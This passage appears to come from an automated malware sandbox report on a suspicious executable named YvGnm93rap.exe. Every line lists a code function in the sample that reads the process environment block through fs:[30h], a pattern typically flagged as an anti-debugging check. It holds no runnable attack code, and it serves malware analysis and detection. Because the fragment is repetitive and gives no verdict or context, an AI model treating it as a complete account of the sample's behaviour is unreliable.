            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EFC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EFB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EFB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F14120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F14120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F14120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F14120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F14120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F22AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F22ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F0AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F0AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F3927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FAB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FAB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FBEA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F84257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F34A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F34A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F13A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FBAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FBAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EFAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EFAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F08A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF5210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F203E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F203E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F203E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F203E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F203E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F203E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FA23E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FA23E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FA23E3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F753CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F753CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC5BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F24BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F24BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F24BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F22397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1EB9A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1EB9A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2138B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2138B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2138B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FAD380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F01B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F01B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F23B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F23B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EFDB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC8B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EFDB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EFF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB14FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F76CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F76CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F76CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC8CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F0849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1B477 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2AC7B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F1746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F8C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F8C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F76C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F76C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F76C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F76C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FA8DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F0D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F0D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FBFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FBFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FBFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FBFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F76DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F76DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F76DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F76DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F76DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F76DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F21DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F21DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F21DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FC05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F235A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00EF2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F2FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F22581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F22581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F22581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00F22581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB2D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB2D82 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\YvGnm93rap.exeCode function: 2_2_00FB2D82 mov eax, dword ptr fs:[00000030h]
